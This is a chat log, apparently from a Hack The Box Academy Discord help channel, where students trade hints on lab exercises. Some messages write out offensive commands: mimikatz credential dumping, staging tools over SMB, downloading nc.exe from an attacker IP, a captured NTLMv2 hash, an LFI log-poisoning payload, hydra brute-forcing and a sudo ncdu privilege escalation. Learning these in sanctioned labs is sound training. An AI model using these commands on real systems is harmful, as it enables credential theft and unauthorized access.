^

Yeah, had some issues with SSO so i deleted the old one and made new, but now i can't identify

so this would be the good one ?

thats not really intuitive when your a noob like me x)

I think you gdb wasnt' set up right

i mean it just requires a bit of learning of b16 which is definitely a useful thing to learn anyway

^ all value you're seeing in gdb is in b16

why do you say that ? I haven't change nothing to my gdb

hex to decimal conversions aren't that hard

it might be that gdb defaults to 16

I saw that at school a long time ago

10 is a good number to know in all your bases

because it's not showing in b10 like in the module

i.e. 10 = N in baseN

how can I change that do you know ?

nope

man pages are good

I mean it doesn't really matter, if you see a-f, it's b16, if you only see numbers, it's b10

^

the step instructions being in b16 for gdb won't influence the storage output of variable

I'll check more about that

thanks for the help 🙂

it just means you may need to change your step + to be the hex equiv to the decimal one

if you want to quickly convert hex in bash
echo $((16#<hex>)) e.g echo $((16#a)) prints 10

ssh from windows is different from linux? "you can open a PowerShell console on MS01 and SSH to 172.16.5.225 with the credentials htb-student:HTB_@cademy_stdnt!" when i do ssh htb-student@172.16.5.225 and enter the psw it fails, what am i missing here

are you doing ssh from the windows host in powershell?

Exactly yes

then it should work

To use the secretsdump.exe

it could be that for w/e reason the clipboard isn't carrying over

doing a ping to the ip responds from the windows host

if you're trying to copy/paste

checked that aswell and it working properly

will do manually, lemme see

also it's set up to just right-click paste

what's the problem here? you can't ssh from your linux attack host?

(also adding +clipboard to your xfreerdp makes copy/paste features more stable)

they likely don't have a pivot set up

and tbh it's not strictly necessary ¯_(ツ)_/¯

LOL i tried pivoting but everything is not possible

Tried dynamic port fortwarding but coudlnt

i just entered the psw manually and it worked, so weird

Thanks again marcie

np

sometimes it's just dumb

Alright I'm really stuck on this AD assessment 2...I managed to get a SYSTEM shell on the SQL01 host, and the next question asks for Administrator access on MS01, I found an Admin hash in memory but trying to pass that hash has proven futile any tips, am I not on the right path assuming this hash I found is the one needed?

it's him

i now have a new thing to send to people either sarcastically or in praise

source: job hunting and one of the jobs had this as their job post name

10/10 (btw the job itself was for a business analyst)

actual job

where did you pull the admin hash from

Question, how do i setup so i have access to the internet while connected through the vpn on my kali machine?

the vpn shouldn't effect anything

it's a split-tunnel; i think you need to go to the interface and select it though and "only use this for resources on it's network" or something

plenty of people have had the same thing asked in #1024429874246590575 so maybe you can find a thread there that's been resolved and contains the answer

but it does for some reason, i can't go through to the internet

Ill take a look around

discord also has a handy search feature

Yeah, but don't know what to search for.

I ran mimikatz from the SYSTEM shell I landed in from the SQL01 host

what command

"Kali vpn internet"

||lsadump::lsa /inject||

Which gave me a hash for an Administrator user that I then tried to pass through evil-winrm, xfreerdp, CME, but nothing

https://discord.com/channels/473760315293696010/1083002697638232074 this looks to be the most comprehensive post re: no internet w/ vpn

you probably got a mscash, you won't find DA creds there, try another lsa command from mimikatz

Thanks, found it in #prolabs-dante message

mscache is the one with DC2 at the beginning right? This was definitely not that it said NTLM hash, I'll keep trying to play around with mimikatz though

Now i found mascache v2, but I'm guessing from your answer that thats not what I'm looking for lol

check what domain it is. what's the difference between a local account and a domain account?

So is the reason why I am not seeing any mimikatz.exe file in the /windows/temp directory is because I might not have the right permissions:
sudo smbserver.py -smb2support CompData /usr/share/mimikatz/Win32/

PS C:\windows\system32\inetsrv> cd ../../../
PS C:> net use \10.10.15.20\CompData
PS C:> copy \10.10.15.20\CompData\mimikatz.exe \windows\temp
PS C:> cd windows\temp
PS C:\windows\temp> dir

try adding C: before the \windows\temp\

I corrected that command and I still do not see the mimikatz.exe executable in the temp directory:

copy \10.10.15.20\CompData\mimikatz.exe C:\windows\temp

try specifying a filename after C:\windows\temp\

i.e.. C:\windows\temp\mimikatz.exe

windows is very touchy about specifying output files

also dir your own share, is the right file even there

it should be, they showed earlier that they started the smbserver from that file location

Honestly I'm at a loss I have tried every conceivable combination of mimikatz commands (sam, secrets, etc.) and I keep getting the same NTLM hash for an Administrator account

Which is the local admin account for the SQL01 host so I understand the point of distinguishing between local and domain accounts, however I don't know how I can specify this in mimikatz

you can't, it will return whatever infromation it finds, in this case the DA's creds simply isn't present on that host

I've already said that you won't find DA creds there

My bad I thought when you said "try another lsa command from mimikatz" that it meant I could eventually find the needed creds there

you will find the next step, it's just not DA creds

Ah okay gotcha

use my tool if you can't figure it out, should be easier to spot

Tried that and it did not work:

sudo smbserver.py -smb2support CompData /usr/share/mimikatz/Win32

copy \10.10.15.20\CompData\mimikatz.exe C:\windows\temp\mimikatz.exe

Also , I checked to make sure that mimikatz.exe was in the right directory.

so if you do ls -lA it shows it as "mimikatz.exe" (all lowercase?)

Doesn't show anything. Guess I am on a windows machine that doesn't allow me to see the permissions

i meant in the directory that 'has' the mimikatz file you're trying to download

alternatively dir \\ip\share\ should list

IT doesn't list anything .

interesting

and if you do ls -la on YOUR system in that directory what's there

(the /usr/share/mimikatz/Win32/ directory)

the mimikatz file is there

weird

idk what's going on with it then ¯_(ツ)_/¯

without error output we don't know what's going wrong

get a proper shell

That too

The shell you're using isn't redirecting errors to you, so you can't see what's wrong

I'm having some problems getting the flag from the module Web Enumerations. When I log in with the credentials I found I just get a white page. I checked a walk through cause I couldn't find any other info than the one I tried to login with. The walk through used the exact same credentials, found the same way, but got a flag. Any ideas what might be the problem on my end? I'm using a VM with Parrot OS if tha can be an issue?

That shouldn't be an issue, the pwnbox is a parrot vm

is it "normal" that the computers.json file does not load on the skill 1 AD ?

Just trying to transfer SharpHound for AD Skills Assessment 2, but there seems to be an issue

Hello, not sure if this is the correct chat to ask. I couldn't figure out where to put this but anyone else have troubles downloading the OVPN?

you "/" before filename

Nvm! I think I finally got it. Had to swap the server selection

ip:port/filename

refer playlist https://www.youtube.com/watch?v=kRI_LgymWmk&list=PLhaWVsHHAWfukp27Y1XZkZF4-Jbp1X92_ for other ways to transfer

you did :port:file instead of :port/file

:P

there's a whole module re: filetransfers

which is fairly early on in the CPTS path

You will have to excuse me

What would be a proper shell in this case? a shell that has a powershell command line where I am an Administrator?

I believe the file transfers module included an additional line for error cases like this

it's a simple file transfer. I already have access.

try adding -UseBasicParsing

yes: but i'm referring specifically to the error you're receiving

You should be using -Uri in windows wget..

Example: powershell wget -Uri http://192.168.xx.xxx/nc.exe -OutFile C:\Windows\Temp\nc.exe

it doesn't matter entirely

at least not to my knowledge

the error doesn't indicate that's the issue at least

ok skill asessment 1 from ad done 🙂

Giving it a try doesn't hurt is what i think. Ofcourse, lot of errors does not straight away give exact solution. But -UseBasicParsing should work as well with -URI i think

wget $IP:$PORT/$FILE -o $FILE works 🙂

i did it 20 times or so in the last hours

For question four of that assessment... did you use the smbserver.py tool to transfer for the tool you needed to answer that question?

i use mounting my drives via xfreerdp or remmina

did you use an smb port to mount? did you have to refer back to your pivot module?

i use chisel and proxychains

you miss a lot without using ligolo

i will have a look into ligolo-ng soon

https://4pfsec.com/ligolo#heading-adding-a-new-route-on-proxy-server this help me a lot

thx 🙂

i am going to sleep , hopefully i can do ad skill asessment part II then 😉

Did you download ligolo-ng (using ' git clone https://github.com/nicocha30/ligolo-ng.git' ) to your attacking machine?

you might face some problems with binaries after compiling them and use them against ur targets , so it's better to use https://github.com/nicocha30/ligolo-ng/releases

Did you download what you needed directly from the website or did you use the git clone method?

get the binaries from the releases

Not sure where the binaries would be in that link

binaries are the executable files

everything in that page is a binary

you just untar the file and boom, you have a ready-to-go file

just download the file from this link , based on your arch

proxy is for your system; agent is for targets

yeeah exactly

Can you guys list some great-modules using less cube?

if you are a student , then just go for student subscription

My machine has been "terminating" for 15 mins now? What steps can i take, I have closed and end my browser session yet its still terminating. I have this problem only every night using an enterpise account

Anyone having problem spawning Target machine?

yup i feel like this happens everyday at this time

Same, everytime around this same time it gives me that problem

hi guys how to fix target not spawn i cahnged my vpn settings and no work 😦

I believe this is day 3 or 4 that its happened to me in a row

Are the proxy and agent.exe files are what you got when you unzipped your tar and zip files you downloaded?

hi guys how to fix target not spawn i cahnged my vpn settings and no work 😦

There is no personal fix, you have to reach to HTB Academy support.

Hack the box is down not you

Just spawned target machine

if you read the filename it'll tell you what should be in it

but the reason it's failing to move is because you don't have a /tools/ligolo/ directory

mv doesn't automatically create a directory, you need to add a flag to the command for it to do so

I had already created that directory

no you have a /home/{username}/tools/ligolo directory

there's a huge difference :)

two of the options would have been either mv file tools/ligolo/ or mv file ~/tools/ligolo/

when you just tell it /tools/ligolo it's looking in the filesystem root for /tools/ (which likely doesn't exist)

this is basics of linux

use "pwd" to see the difference

attacking common services + 1 What is the password for the "mssqlsvc" user?

do i use responder to capture the hash?

perhaps

use the techniques as discussed in the section/module

||mssqlsvc::WIN-02:5410f9edd7d1aad2:E596AEF74C7AC8B5814CB402C393FB72:010100000000000000441CF0DA61DA011F7BD92A5A9E364C0000000002000800560042003100340001001E00570049004E002D004D0033005A005900390046005500430045004600560004003400570049004E002D004D0033005A00590039004600550043004500460056002E0056004200310034002E004C004F00430041004C000300140056004200310034002E004C004F00430041004C000500140056004200310034002E004C004F00430041004C000700080000441CF0DA61DA0106000400020000000800300030000000000000000000000000300000C4A07265C5BBE84D23FDB8C10487302A9B3CE13BAF231C09E941646BA766B9690A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00350035000000000000000000 what is the ntlm hash right here||

what is the last bit and middle bit?

is that full thing that ash>?

you can always ask "hashid" xD

even that this is type of hash is very famous

it's ntlmv2: the whole thing is considered the hash

and can be cracked with hashcat

So I took a break for a while from AD skills assessment 2, came back with some freshly brewed coffee sat down and instantly saw where I was going wrong, after I got over that hump everything else came pretty easily. That was definitely a fun Assessment

@next bronze thanks for the nudge in the right direction btw I appreciate that you didn't just spoil it and let me figure it out on my own

why is the FQDN in is ns.inlafreight.htb and not roo.inlanefreight.htb ? why is ns.inlafreight.htb is even FQDN i thought it was suppose to be a subdomain?

because the second part is the contact root@inlanefreight.htb records will use . in place of other symbols

the true answer is in the NS and A record

both showing the answer

https://www.cloudflare.com/learning/dns/dns-records/dns-soa-record/

thank you

ill go check it out thanks

i had issue with AD module page 35 ...

is anyone having same issue while submitting answers

"AD module page 35" isn't very helpful dude

just link the page

I'm pretty sure he means AD skill assessment 2 it says page 35 on it

and no I had no issues submitting my answers at least

being pretty sure is one thing; but it doesn't help if we have to try and translate what module/section they're on

then further try and understand what they're trying to do

Yeah and I just remembered there are other AD modules on HTB academy so my guess could be completely wrong

you're likely right but being lazy with questions means you'll get lazy answers in response usually

Yeah fair enough

and if their issue is with an answer then it's likely they're wrong or have an extra space or plenty of other plausible things ¯_(ツ)_/¯

I strongly suggest figuring out why invoke-webrequest (wget is just an alias) but also know that you can upload and download files in the evil-winrm shell. upload /path/to/SharpHound

gj

Heya, im connnected to a machines ovpn but I cannot ping the ip, what might cause this?

could be a multitude of things

can you scan it with nmap -Pn ip?

but also if you're referring to active boxes on https://app.hackthebox.com then you're likely better off reading #welcome and asking in another channel after linking your account

Just hanging unfortunetly

Hi, is it just me or does modules always require more than what is shown with the module.

Each module deals with one topic. However, prior knowledge may be necessary. Some of the modules also build on each other

depending on the module as well; they may be expecting some level of understanding of underlying concepts as well

every module details page has a blurb for example Footprinting:
A firm grasp of the following modules can be considered prerequisites for successful completion of this module:

• Linux Fundamentals
• Network Enumeration with Nmap
• Introduction to Networking
• Windows Fundamentals

Usually they're referencing other modules

but you can always check those modules to see if you know the content

for example: Network Enum with Nmap is before footprinting in the CPTS path, and the Fundamental courses are in the "Information Security Fundamentals" path that's considered a pre-requisite for CPTS

so in theory you should have a grasp of the concepts being referred to

AD Enumeration & Attacks - Skills Assessment Part II - Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host.

Can someone help me with this? I've got a rev shell with Print Spoofer exploit, got the highest privs. I've uploaded mimikatz to get the admin hash. However, when i use evil-winrm to pass the administrator NTLM hash I can't authenticate to MS01.

are you sure the hash you're finding is the admin hash for ms01

Thank you. you are correct I wasn't following any path.

and some people aren't interested in doing the paths and just wanna take the courses they're interested in

¯_(ツ)_/¯

Thank you.

if i was sure, I wouldn't be asking for help.

i mean you have AN admin hash

¯_(ツ)_/¯

Have you completed the module?

🙄 perhaps the hash you have is admin for the SQL server

if you want me to be more direct about it

Try using Bloodhound see if there's any path from SQL01 to MS01

hows it going guys i need 57 more cubes to unlock using web proxises module, does anyone know if getting the monthly sub will unlock it or do i have to get more cubes ?

monthly sub will get you the cubes any tier i think

anyone know parrotos htb edition will update

?

htb edition isn't really maintained by HTB contrary to the name

it's maintained by parrot devs; latest edition is 6.0 download from their site

atm they don't have ARM architect versions of the download

but they've been working on getting stuff up as soon as they get it stable

dat mean i cant sudo apt update dat shid?

if the repos are available you can, but if you're running ARM - then you're not gonna have a major update atm

also for parrot distributions it's best, for full-upgrades, to do sudo parrot-upgrade as it's a wrapper for update & upgrade that does some autocleaning once it's done

oh i c danke

Can I give you my email?

why

no

hell no

Nevermind

but also porque why?

you want to hire an elite hacker?

this isn't the channel nor server for that kind of thing

Isn't it nice that you will get the e-mail and play it?

why

what that thang do

nice

what, you want my number?

fuck no

tell me why you wan tto email

nvm missunderstanding

and i will email you

<@&861185840277487616> they've resorted to spamming their email now

a keylogger >:)

don't be stupid

i joke

why dont you apply for HTB staff

i have, they've said no

why

¯_(ツ)_/¯

hell nah

i mean i can definitely be more of an asshole as not a staff member

so some more freedom of tongue there ¯_(ツ)_/¯

💀

(⁠✷⁠‿⁠✷⁠)

What exactly is your part?

anyone with a Hint for skill assessment on advance XSS and CSRF module, i'am able to bypass CSP and get XSS to myself , but all my payloads that target admin seems like admin don't see the images so i am missing something to make admin trigger my payloads.
thanks an advance

never give up, you should try again

I have, they've said no

did they say why tho?

nope

most companies don't give a reason why ¯_(ツ)_/¯

thats odd

it's not uncommon LOL

HTB is company?

yes HackTheBox is a company

wait fr?

yes

the people with the "Staff" role are actual legit employees of HTB

are you a pen tester irl

i though it was like comunity with profit-like goals and also educations as well

they need to have some level of staff to be able to operate a support chat

like chess.com

buddy, i'm about to blow your mind

chess.com is a company

alr...

they have a CEO

ik the ceo

falcon mentioned him

Falcon is a part-time staff at HTB

ig u gotta...like rank up and become pentester or smth to go for staff?

no

just apply on their website

there's plenty of positions that aren't pentester positions

u sure?

yes LOL

i've looked at their positions to apply for

we're getting off-topic at this point

i would go in general but i cant link my htb account with this which is my alt discord

reach out to a mod then

only @remote latch can

im shy

you can only link your htb account to one discord account

https://tenor.com/view/holes-grandpa-thats-too-damn-bad-gif-15698581

@slender shoal can you kindly help them out

anyway glhf on modules guys

danke u too

normally we don't bite 😉
If you need help, let me know

well.....is there way for me to link my alt to my htb account?

your main would have to be unlinked

Yeah, send me a dm

:(

like you can't have 2 discord accounts linked to the same htb account

thats sad

it's reasonable

lol it prevents impersonation attempts if someone somehow got ahold of your identifier

it's also an ease of moderation tool

allows actions to be tied to a user and action can be taken on the platform as well, depending.

imagine having enemies in htb that try to impersonate you lol

I'm pretty sure rabbits bite

or taking over an account that has a decent rank in order to shill a writeup ¯_(ツ)_/¯

still counts as enemy

or as someone who's dodging and weaving ban evades

then the mf is simply taking the souls of others

i mean if the account is tied to you then the account can get banned ¯_(ツ)_/¯

only if you are not nice to them

Almost two weeks to go before I attemp AEN module, damn this was exhausting. 🙂

gj

We are almost at the same point!

😢

I wanted to ask, whats the best path to get into cyber security? I started on Networking module first then queued up few more like windows/lynux basics etc. But i wonder would it be better to start off on pen tester module right away?

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

the pentester path assumes you already know the basics

Well, I do and don't, but wanted to basically get a stable footing then delve deeper in the pen tester route. Learn what makes the system tick before i can start and try to exploit it.

i see

Until now I was enumerating and then going down a rabbit hole when I found something. It just dawned on me that it might be more manageable to enumerate everything I can see and make a list of creds, files of interest, etc, before I go to work on any of it. How do you guys go about starting a new network?

I found it easy to get lost when dealing with more than one host

Also... Hard Password lab kinda easy, no?

This is one of Tip mentioned several times in the CPTS path . One instance I can think of is in the Windows privesc module.

I'd say thats one of the things that's been causing my brain to melt. Especially when dealing with several users, password mutations and services. I don't know how many times I've spent ages on one service and the door was wide open on another.

This is a great course. I loved the password module

Hello, Im having a problem in my account in htb academy where in I changed my email account into my student email, then when I'm verifying it, there is problem occured, and now I can't use my account since I need to verify it, but the problem is I didnt receive any email in my student email. sorry this might be off topic to this channel, I hope you can help me. Thanks guyss

Reach out to support

they need to hire real community manager(s) who are well trained and know about conflict resolution. my friend's company http://greynoise.io hired one and she's amazing. they are real game changers. if u get 55m and can't hire a cm to lube ur customers up and keep the peace but instead have someone like your buddy cloud (who is defo bad for optics. posting mod abuse pictures then saying things like "i've announced my arrival" is narcissistic and concerning - a paid cm with a proper communications and media background would N-E-V-E-R)

it's bad for optics to have a moderator who is accused of being abusive post memes about it and do narcissistic things like write, "i have to announce myself" subsequent to an emotional and dramatic exit-stage-left

Hi, I am having the same issue.Would you mind if I DM you?

that's just my opinion. as someone who isn't a kid being sold trainings and promises about an industry into which they've no insight.

also, culturally, hackers go to war over less.

know your customer.

sure!

go build -o agent cmd/agent/main.go

When you were trying to start the build process , did you get this error thats in the following screenshot:

i try to connet to tomcat manager but when i enter the credentials they wont let me in in the manager page

in shells and payload live engagement

which creds are you using?

tomcat / Tomcatadm

weird, i did that yesterday and it worked

same i did it yesterday and its worked and now they wont let me in

try to change VPN

bruh

whenever i put the username and password this panel keeps re appearing

i did 😦

the only possibility is that you are inserting wrong creds

when you do insert wrong creds they redirect you to a 401 unauthorized error page

unlike when putting the right creds

im confused

yesterday while i was putting creds from https://github.com/netbiosX/Default-Credentials/blob/master/Apache-Tomcat-Default-Passwords.mdown i was receiving again and again this popup

which means that the creds were wrong

yeah true

i just wrote the password in note copied it nd pasted it

and its worked, seems like i was putting wrong password somehow

._.

bro

less JJK more pentesting cmon

what does jjk means?

lol

JuJustsu Kaisen

You need to fix your go packages

lmao bro i swear i was stuck on this live engagement for 2 days

because of internet *(always disconneted network from rdp) and because i was putting wrong pw this whole time

Yes i hated that section bc rdp connection was slow asf

i had to wait 10+ secs to write a command

frrrr

but the rest is quite chill, i completed all in 1/2 days

So I determined that the main.go is not in the path its supposed to be in (with the /agents/main.gto folder ...but I typed 'locate main.go' on my machine and a bunch of results for main.go come ...but they are all in different directories. Not sure which one to use

go build -o proxy cmd/proxy/main.go
cannot find package "cmd/proxy/main.go" in any of:
/usr/lib/go-1.19/src/cmd/proxy/main.go (from $GOROOT)
/home/htb-ac-767577/go/src/cmd/proxy/main.go (from $GOPATH)
┌─[eu-academy-1]─[10.10.15.83]─[htb-ac-767577@htb-egtfxomkph]─[~]
└──╼ [★]$ go build -o agent cmd/agent/main.go
cannot find package "cmd/agent/main.go" in any of:
/usr/lib/go-1.19/src/cmd/agent/main.go (from $GOROOT)
/home/htb-ac-767577/go/src/cmd/agent/main.go (from $GOPATH)

Module:

File Inclusion

Section:
Log Poisoning

Question:
Try to use a different technique to gain RCE and read the flag at /
My payload:

GET /index.php?language=/var/log/apache2/access.log&cmd=cat%20/c85ee5082f4c723ace6c0796e3a3db09.txt

I have accessed the log and placed the shell in user just like the module says to do, but when I use the payload above I dont see the response of the commands

damn. NetExec is a lot better for network enumeration

Just learned about nmap firewall evasion in the nmap module, so interesting with the -sA (ack scan) that the FW gets confused and does not know if a host on the internal network has initiated the connection with the external network.

🙂

hardest part so far

hello , any ideas abt how to disable windows privilege after enabling them , for example I enable SeBackupPrivilege using the SeBackupPrivilegeCmdLets but what if I want to backtrack my actions ?

in a real world scenario ?

no just playing with win PE , it's easy to enable priv but can't figure out how to disable them

hello , what is your question

ah ok in a real world scenerio, hopefully your report covers it so the admins can set it back to "normal"

sorry i am bit dizzy from the skill lab 2

yeah you need always to put any changes you made in the environment in the report

Definitely the one

you can modify them in local secrity policy or group policy. or you can do it through the AdjustTokenPrivileges winapi
https://learn.microsoft.com/en-us/windows/win32/api/securitybaseapi/nf-securitybaseapi-adjusttokenprivileges
https://learn.microsoft.com/en-us/windows/win32/secauthz/enabling-and-disabling-privileges-in-c--

so I need to wirte a script or something , can't done it using cmdlets ?

afaik no, either use the gui or call the winapi directly

but to call the winapi , I need to do it programmatically

correct

okay thank you

idk what you're referring to for SeBackupPrivilegeCmdLets, but you can take a look at the source code, it will be the same thing but removing instead of enabling the priv

I just use it as example , I was wondering if there's a quick way to done it

anyone having problems with the network?

I tried copying the main.go code from the ligolo github page and creating a folder called agent(that would contain my main.go code) and the build command still did not work.

Is it even required that I even do the build command(despite that being the first step in the ligolo steps github page?). All of the video tutorials I have looked at seemed to skip this step and go directly to downloading the binaries I would need

follow this

and you need to run the go build ..... from the directory you cloned

why build it when there are precompiled binaries

no idea

the precompiled binaries are better since they will work on all the machines

I went to that link and directly downloaded the tar and zip files . so do I need to clone that link?

no just download the zip file , unzip them and you are done you can then use those binaries

Okay I did that . So I don't have to build anything.

no need

Hi I am currently linux priv escalation Environment enumeration. I found an another user || lab_adm||and sudo -l gave me || /bin/ncdu || but i am strugguling to escalate privs can someone point me in the right direction?

RTFM

you need to find smtg that spawn the shell

i do but i am still htb-student

you tried with sudo /bin/ncdu ?

So are these the two excutables that you downloaded on your kali linux machine?

ligolo-ng_agent_0.5.2_windows_amd64.zip

ligolo-ng_proxy_0.5.2_linux_amd64.tar.gz

yes

you need to switch to the lab_adm user

i tried su lab_adm

you basically run the proxy on your attack machine , and the agent in the pivot machine

this

so I need to move the ligolo-ng_agent_0.5.2_windows_amd64.zip to my10.129.44.2 address(ie a file transfer method)

not the .zip just the binary .exe file

is there a way that i can use ncdu to switch to lab_adm user?

the agent.exe

show me sudo -l please

sudo -u lab_adm /bin/ncdu

oh shit

thank you mate

Hi everyone, I'm encountering a problem in the ''attacking smb'' section of the ''attacking common services'' module. https://academy.hackthebox.com/module/116/section/1167

in particular I am referring to question 3:

The last question is difficult to interpret, it says to make an ssh connection once the password has been discovered, but when I connect it tells me
jason@10.129.203.6: Permission denied (publickey).

so I thought of using smbmap -H 10.129.203.6 -u jason -p ' -password-' --download " GGJ\id_rsa"

download the rsa-id for me

and how do I use it now?

please help me when u have finish

ed

using an rsa_id file is BASICS (heck i believe it's shown in the getting-started module)

you gotta make sure it's not world writeable or readable

changing linux file permissions should be easy

I changed the permissions, 600

cloud isn't staff lol

clearly

¯_(ツ)_/¯

marcieeeell

i mean not all mods are staff

thanks ❤️

i have finished

basics go a long way

ahahha sometimes i am very stupid

i mean you don't need to shit talk someone to make a point

? i described behaviors and did not resort to any vulgarity or profanity

wym 'shit talk'

these events happened.

you literally talked about cloud as an example. also referring to "A real CM would N E V E R"

yes as in a professional community manager who is paid AS A JOB

and moderators aren't there to be CMs

i also used my friend company as an example that you're glossing over

i'm not glossing over that lol it's irrelevant to the point i'm making

i was making a point that a company with 55m in funding would do well to have one and citing examples of real behaviors and instances of actual professionals being used

https://tenor.com/view/cyber-war-ashwamedham-movie-cyber-hacking-trending-gif-3217576645982354930

CMs != discord mods

you are making a point absent meaningful context when you first attempt to construct a narrative and produce victims where none exist. to disregard the comparison used between the examples is not irrelevant. it's ignorant.

"meaningful context" your friend owns their own company, congrats?

different communities have different needs

no, the behaviors from a professional and a volunteer are being compared. you can not ignore the other half of the comparison marcie

https://tenor.com/view/popcorn-guy-relaxing-popcorm-popcorn-gif-26404903

I like most of the Community Staff that exist here

¯_(ツ)_/¯

the point is, Cloud shouldn't be compared to the level of a professional my dude

you seem like you would.

he never purported to be staff

you present as someone who is vying for position.

best of luck with that.

you present as someone with a stick up their arse

"This volunteer isn't as proffessional as someone paid to do the job," OK?

https://tenor.com/view/discordia-discord-discordian-war-drama-gif-6017844285476930533

I think you're wasting your breath lol

not to mention, cloud stepped away from the server for a bit to cool off instead of remaining in and potentially doing more damage

keep calm guys, there is no need to get so heated, we are all friends and the best, if they like to help the less good, but we are and remain all friends ❤️

i'm indifferent

Clearly not

just making observations

fewer observations, more exploiting

more hacking

i'm done with the newest release

"just making observations" - Calling a mod out for having a shitty moment of character rather than their behavior overall

are u done w/newest release?

maybe less chatting more hacking. there are two paths on that one which are fun to discover.

From a business aspect whether or not it was a one time thing I have to say it still has consequences

seasons are shit, maybe find another more interesting thing to point people to when you can't find a valid argument

which has/is being rectified

Cool

sure but when you use the argument that i should be exploiting more and i respond with content in the same environment which promotes exactly that, it's 'shit'

i thought it was fun not shit.

bans on average aren't just handed out easily; reportedly there were conversations with mods behind the scenes that led to some of the bans

and speaking for some of the people that got hit, it's absolutely fuckin funny considering what they've said

Oh they do nowadays

Just to save you tme i dont care all that much

on average

infact im gonna head out

Yup, that’s why I said nowadays

i'm allowed to say that behaviors which are bad for optics are indeed bad for optics. when you wear a dominos pizza uniform and hit someone with your car it's a bad look for the pizza place.

compared to a real life example of how it's done well it just escapes you and you characterize my observations as shit talking. too bad.

jinn don't be touchy

Hi guys, I'm stuck at "Information Gathering - Virtual Hosts". I got all 4 flags but can't find the last one. The question says to look for a specific vhost that starts with the letter "d". I checked all of them but don't know which one could be the right one. Any hints?

Target has been spawning for a solid 15 minutes 😭

you could have phrased your observations without calling someone out specifically

and those who know the situation will know ¯_(ツ)_/¯

Could have, but it was fine in this case 😄

i disagree with that notion but w/e

I rarely agree with jinn, but this time I do

it just feels like taking a dig at someone instead of trying to be more general to prove a point

because being honest there have been a lot of shitty mods in the past

I’ll consider it 2 birds 1 stone

that would have been far more apt to mention rather than cloud

like cloud's outburst was a drop in the bucket for terrible behavior exhibited by mods

You’d expect at least some level of professionalism

welp tbh it's not a good argument to say there were worse mods

I just mean there were mods that actually consistently abused their mod privs

the Investigating With Splunk module was amazing

if you want to practice it on a big scale look into the free "boss of the soc" from splunk. Its a ctf that has a ton of logs from several computers over a span of weeks that you can investigate with splunk, everything from reading someones emails to checking their browsing history to ransomware execution

cool, will check it out later after i finish the soc path!

I'm having some issues with hydra in the Basic Toolkit. I'm on the skills assessment, and I'm guessing my syntax is wrong but I can't figure out where. Right now I've got: hydra -l user -P /usr/share/wordlists/rockyou.txt <IP> -s <port> http-post-form "/admin_login.php:user=^USER^&pass=^PASS^:F=<form name='log-in'"

When I run it, it says the first 16 passwords are all matches and then stops.

the :F=<form name'log-in' part at the end tells hydra how it detects a failure or success (in your case a failure, because of the "F"). what it means is "try to log in with these credentials, if you see the following in the html response its a failure: <form name='log-in'. If it detects everything as success then it means your filter in the end is wrong and it doesn't appear in a incorrect login

log-in is what I found in the source code for the name of the form, so I'm not sure where else to look to find a fail criteria

check if its really written that way, with single quotes and all that

html might also chuck some classes between form and the name=, might be easier to use some plaintext on the page

or just the string 'log-in'

yea like the text on the login button or something

just something that sticks out

So apparently my router is blocking me from sending any information through the username and password blocks because it's unencrypted. That might be the reason.

oof

Yep, that was the reason. I'm an idiot. Thanks for the help guys.

it's never DNS (it was DNS)

At least I know netgear armor does something I guess

dont hate yourself, i was trying to solve challenge for 3 continuous days until i realized i had already solved it

reading through your notes and you see the answer you wrote down 3 hours ago :(

Hey Guys, me again haha.. For the following question: "What other user in the domain has CanPSRemote rights to a host?" i'm using the provided cypher query and it always returns the same user which is not the answer..

hey guys im pretty new to hackthebox and wanted to ask if maybe anyone can help me setting up the openvpn connection to the Machines i can try to hack there, i dont know if sth on my macbook isnt set up allright or im just really blind but i cant fix it myself.. if this aint the right channel please let me know 🙂 thanks in advance

hi , did you google it before ?

pls stop being that cutie

yes ofc i did but im also following a tutorial but the weird thing is it says there should be 2 open ports when i scan it with nmap but i just find once open port (22/tcp) and thats not the one needed so i dont know where my "misstake" is

pls change your pfp it hurts me

who? lol

patrick

if you're referring to active machines or starting-point boxes there's a different channel for those

just 4 u

read #welcome to find out how to access more of the server

okay im sorry

❤️

maybe then it IS the right answer 🙂

How do I access the Academy server?

No its not, tried like 50 times lmao

both caps lock, lowercased l0l

when there are 2 , 1 its not not , who could it be then ?

sometimes the questions are missleading

how tf is long password attacks module

Should just be username, mine was all lowercase, no @ if you included it

is it the part wth a user beginning with "y" ?

It always returns the user for***@inlanefreight.local and the machine being MS01

Same as the user explained in the section

link ?

https://academy.hackthebox.com/module/143/section/1275

the "b" one ?

sry me again... can anyone help me or tell me who would be willing in helping me in the first steps? im kinda lost
and i wrote in a wrong channel (i know) but i cant find the right one and im just looking for some help and this is what this community is fot.. so please tell me what i can do or who can help me please
i tried it the whole day with youtube tutorials and the stuff on the website but it didnt work for me..

I am having issues figuring out where to go with the Attacking Common Services - Easy box. I identified the open ports on it and tried brute forcing smtp and ftp with the password list from the Resources tabs and rockyou.txt with no results. I tried brute forcing mysql with hydra but it errors out. Any help is appreciated.

no "b" user shows up

yes

the question is missleading

I really cant believe that i spent one entire hour and still havent figure it out, this is so frustrating man

i know

😄

Already crying for the Skill assessment for this module

i finished it today

I envy you

Why is the question missleading?

because it asks for "other"

Query used: ||MATCH p1=shortestPath((u1:User)-[r1:MemberOf1..]->(g1:Group)) MATCH p2=(u1)-[:CanPSRemote1..]->(c:Computer) RETURN p2||

please...

In my head ive to use that query on bloodhound and expect 2 users, ||FOREND|| and the one im missing..

Try breaking it down into smaller steps, maybe get a username first

I got the email address from the nmap scan so then I started brute forcing the services.

Did you try variations of the username?

naaaaaaaaaaaaa

PASSWORD ATTACKS >>>
Password Attacks Lab - Medium>>>
Examine the second target and submit the contents of flag.txt in /root/ as the answer.

Hey all, in above question I tried using Hydra to get list of username with possible passwords but it didnt give any results. I'm not sure how else to look for a user or get to root. Can someone help/hint?

That's the one I used

again : if it shows 2 , and 1 its not, what could it be ?

I used Metasploit with the username and password lists from the module.

I was trying to use the resources/steps given through module

I'll try that and see if it works. Thanks!

every module relys on the modules before, like password lists can be mutated etc

hm? how to know which is the previous module?

or ur talking about the different parts in a module?

it was general not specific 🙂

ik its general

but previous module like?

wdym by previous module

personally what i think as previous module is for example advanced XXS and the module before is intro to web attacks

but idk what you mean

ah ok i was talking about pathes

This is not the case for all of them

oh

But it’s best to keep good notes, also with users/passwords

